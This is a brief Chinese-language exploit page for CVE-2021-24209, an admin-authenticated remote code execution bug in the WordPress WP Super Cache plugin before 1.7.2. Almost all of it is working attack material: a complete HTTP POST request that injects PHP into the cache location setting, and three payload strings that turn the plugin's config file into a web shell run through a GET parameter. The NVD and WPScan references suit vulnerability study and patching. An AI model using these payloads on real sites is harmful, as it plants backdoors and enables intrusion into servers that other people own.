# WordPress WP Super Cache 插件 < 1.7.2 RCE（CVE-2021-24209）

WP Super Cache Settings -> Cache Location option选项中的$cache_path过滤不严，导致该插件在设置页面中受身份验证（admin+）RCE的影响。

PoC：


```
POST /wp-admin/options-general.php?page=wpsupercache&tab=settings HTTP/1.1
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 501
Cookie: [admin cookies]

_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings&action=scupdates&wp_cache_enabled=1&wp_cache_mod_rewrite=0&wp_cache_not_logged_in=2&cache_rebuild_files=1&wp_cache_location=%2Fvar%2Fwww%2Fyour%2Fown%2Fpath%2Fexample.com%2Fwp-content%2Fcache%2F%27%3Bsystem%28%24_GET%5B13%5D%29%3Binclude_once+%5C%27wp-cache-config.php%5C%27%3B%27&_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings 
```

payload:

```
';system($_GET[13]);include_once \'wp-cache-config.php\';'

';`$_GET[13]`;include_once \'wp-cache-config.php\';?><!--

';`$_GET[13]`;#
```

ref：

* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24209
* https://wpscan.com/vulnerability/733d8a02-0d44-4b78-bbb2-37e447acd2f3